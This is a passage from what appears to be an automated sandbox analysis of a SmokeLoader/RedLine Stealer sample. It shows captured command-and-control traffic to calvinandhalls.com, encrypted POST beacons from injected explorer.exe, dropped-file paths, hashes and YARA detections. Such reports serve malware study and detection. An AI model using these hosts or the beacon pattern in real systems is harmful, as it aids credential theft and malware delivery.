2024-10-03 21:28:40 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 37 b1 80 d9 81 f6 4a 57 1f 8f 04 5f c4 c1 88 46 ee 18 f5 d8 fe a1 a3 c6 ae 36 1a 9c e0 fa 7a 50 95 22 b4 51 4c 25 b1 f4 18 0d 15 d0 06 0a 15 7b 22 d8 b8 63 41 09 53 8a 61 25 04 92 dd b9 c8 34 da 29 b1 d3 b5 7c 9b b7 ff 21 7f 68 a2 a1 99 ca f2 df ce 53 bb f5 67 4b 05 db de 01 f7 41 65 c4 8c 62 3c 94 b8 4a 79 8f 0f fc ed 98 91 1c 6c 74 27 cb 44 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 66 b6 ee 85 11 52 c9 be 4e b1 d6 66 9c d8 30 3f 8d 93 5a f4 d5 f2 5f 31 3d a5 2f 45 84 49 21 aa 61 87 37 f6 f5 9a 70 4c 4c f9 1d fb e1 fe d1 ef cb f9 05 71 1e 89 dd 8a 35 Data Ascii: 20007JW_F6zP"QL%{"cASa%4)\|!hSgKAeb<Jylt'DUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vfRNf0?Z_1=/EI!a7pLLq5
2024-10-03 21:28:40 UTC	6	IN	Data Raw: eb 47 a6 2d 95 51 Data Ascii: G-Q
2024-10-03 21:28:40 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50018	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:41 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://xdrrfipvxfhn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 340 Host: calvinandhalls.com
2024-10-03 21:28:41 UTC	340	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 66 34 01 83 b6 25 93 3c 5d ce 18 83 97 cd 49 46 e6 14 20 f8 54 fb 9e 76 2d b5 77 0e 26 b2 e0 ea 5e fb ac 6a 00 f5 86 6d b2 70 3d a3 dd 09 76 28 6f 54 3c e8 35 9e cd 90 35 e1 9c 4f 10 52 94 04 3d d6 39 7a 8b 87 b2 c3 4e 08 95 5f b1 71 ab 1a 43 bd 3f b7 5c 78 7d 0d 70 ab f9 17 8a 9b 6f 9e 09 25 f6 be 82 47 dc bf 62 99 9c ea c3 3c 46 cd af aa 64 41 cf 62 47 94 6a 42 4b b5 6f 77 63 eb 02 31 36 f9 b4 ef 3a 70 89 b4 0b a8 64 e8 a5 f6 69 6c 20 76 e0 11 27 73 06 31 c7 3d ff ac 25 2e 7c 28 27 ef a4 4c 77 02 39 88 c5 97 4b 96 d6 30 d3 60 81 96 f2 9f 4a cb 68 Data Ascii: ryga8a-bDDuy(#%P g3iqH[ALf4%<]IF Tv-w&^jmp=v(oT<55OR=9zN_qC?\x}po%Gb<FdAbGjBKowc16:pdil v's1=%.\|('Lw9K0`Jh
2024-10-03 21:28:41 UTC	287	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 21:28:41 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 409 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 21:28:41 UTC	409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50019	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:42 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://vgsfrcxsvaoca.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 327 Host: calvinandhalls.com
2024-10-03 21:28:42 UTC	327	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 30 cc 65 fd b2 e9 3e 15 f1 64 10 85 55 9a e1 3f 08 c7 11 3b 2a a7 a2 87 25 ed fe 44 78 de 86 7b f4 58 25 bb e7 5f 71 79 44 02 25 e9 0b cc da d4 01 cb e4 57 31 3e 8d 5e 17 c4 6e 42 c3 8a a8 a2 07 1d c0 14 bc 7d f7 06 70 9f 1b d6 4f 47 67 11 58 b6 c3 4c be d3 3a 88 4e 1c 91 d2 94 03 b2 e5 71 f5 97 bf c2 4a 39 c3 da 9e 75 1a 92 63 44 89 29 6d 2f 9f 7e 26 6f d0 3f 09 59 9b d6 de 6f 41 ae ba 33 a7 33 e7 d7 c7 62 60 78 54 c7 69 7c 65 38 76 b9 2f f0 c6 2b 40 21 7c 05 82 a5 53 21 38 4d 90 eb ee 46 e3 db 63 d8 41 87 ea ea b4 0f ba 71 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lg4%<0e>dU?;*%Dx{X%_qyD%W1>^nB}pOGgXL:NqJ9ucD)m/~&o?YoA33b`xTi\|e8v/+@!\|S!8MFcAq
2024-10-03 21:28:42 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:42 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50020	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:43 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://msqyarjhmbx.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 238 Host: calvinandhalls.com
2024-10-03 21:28:43 UTC	238	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 71 f1 0e b2 80 c5 3d 46 f2 19 05 ef 2a 9f f9 32 73 eb 74 35 29 81 be 82 27 fc cf 08 5e 9d 86 76 b0 74 5e f9 d2 7f 34 21 01 0d 18 ed 03 98 f6 94 55 ee 95 61 07 4b fb 7e 50 b5 70 0f dd 82 bd b8 3c 66 84 67 b2 7b 83 7f 77 c2 07 b0 50 6c 6e 33 65 c7 aa 1e b1 90 06 ed 09 02 ee cf af 1a cc ac 1d 8f c0 f7 ce 2d 4e d0 ca d6 08 4a a2 42 0a 93 67 69 35 fc 5b 71 52 c5 2d 00 5b f5 8a 8d 14 31 ab b1 68 91 32 e9 b2 c5 09 29 14 44 d6 57 17 62 1b 2a e2 58 eb 83 6d 55 6f 3a 1f f5 97 2c 58 65 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Ld4%<q=F2st5)'^vt^4!UaK~Pp<fg{wPln3e-NJBgi5[qR-[1h2)DWbXmUo:,Xe
2024-10-03 21:28:43 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:43 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50021	23.145.40.162	443	6580	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:49 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://calvinandhalls.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 501 Host: calvinandhalls.com
2024-10-03 21:28:49 UTC	501	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 48 cf 15 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 6b 11 28 eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad ce 1e f6 1b 7f ec df a1 3a c4 82 74 bf a9 ae b0 3c 40 b1 a9 83 68 08 b6 4f 33 ef 1c 56 37 92 48 30 54 cb 3a 16 27 d8 9a c1 22 28 9e f1 4d c6 4d f9 a5 fd 3d 62 78 55 c1 69 0d 6d 2e 12 ea 19 9d a6 13 37 17 43 39 f8 98 43 6d 54 28 ab f2 9b 3a c7 ff 68 fb 45 8a 9d d5 a4 7a b5 55 Data Ascii: ryga8a-bDDuynluIP g3@ZFLj4%<H*%Qg3FIvw]3-jGk(i".A9&FiVbT ?TKLu\|:t<@hO3V7H0T:'"(MM=bxUim.7C9CmT(:hEzU
2024-10-03 21:28:50 UTC	287	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 21:28:50 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 409 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 21:28:50 UTC	409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50027	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:30:05 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://cmiubtivnasjoudw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 21:30:05 UTC	109	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 21:30:05 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 21:30:05 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 21:30:05 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50029	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:30:24 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://jiwfwlcanebf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 21:30:24 UTC	109	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 21:30:25 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 21:30:25 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 21:30:25 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50031	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:30:36 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://lymwoggejifjeow.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 21:30:36 UTC	109	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 21:30:37 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 21:30:36 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 21:30:37 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50033	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:30:55 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://sobtugvkyrrny.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 21:30:55 UTC	109	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 21:30:56 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 21:30:56 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 21:30:56 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Target ID:	0
Start time:	17:26:57
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\9VgIkx4su0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9VgIkx4su0.exe"
Imagebase:	0x400000
File size:	396'800 bytes
MD5 hash:	5D99D66EF42EC43AF05B9304AEBEFDB6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:27:03
Start date:	03/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	17:27:22
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\eihchav
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eihchav
Imagebase:	0x400000
File size:	396'800 bytes
MD5 hash:	5D99D66EF42EC43AF05B9304AEBEFDB6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:28:02
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Local\Temp\3E40.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3E40.exe
Imagebase:	0x400000
File size:	397'824 bytes
MD5 hash:	119C907F0839351B214BD51034B6F124
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:28:25
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\dghchav
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\dghchav
Imagebase:	0x400000
File size:	397'824 bytes
MD5 hash:	119C907F0839351B214BD51034B6F124
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:28:39
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Local\Temp\FDDB.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\FDDB.exe
Imagebase:	0x7ff6dfe20000
File size:	78'336 bytes
MD5 hash:	69C7186C5393D5E94294E39DA1D4D830
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	17:28:40
Start date:	03/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff768590000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	17:28:42
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xa90000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:28:43
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd
Imagebase:	0x7ff64c3b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	17:28:43
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
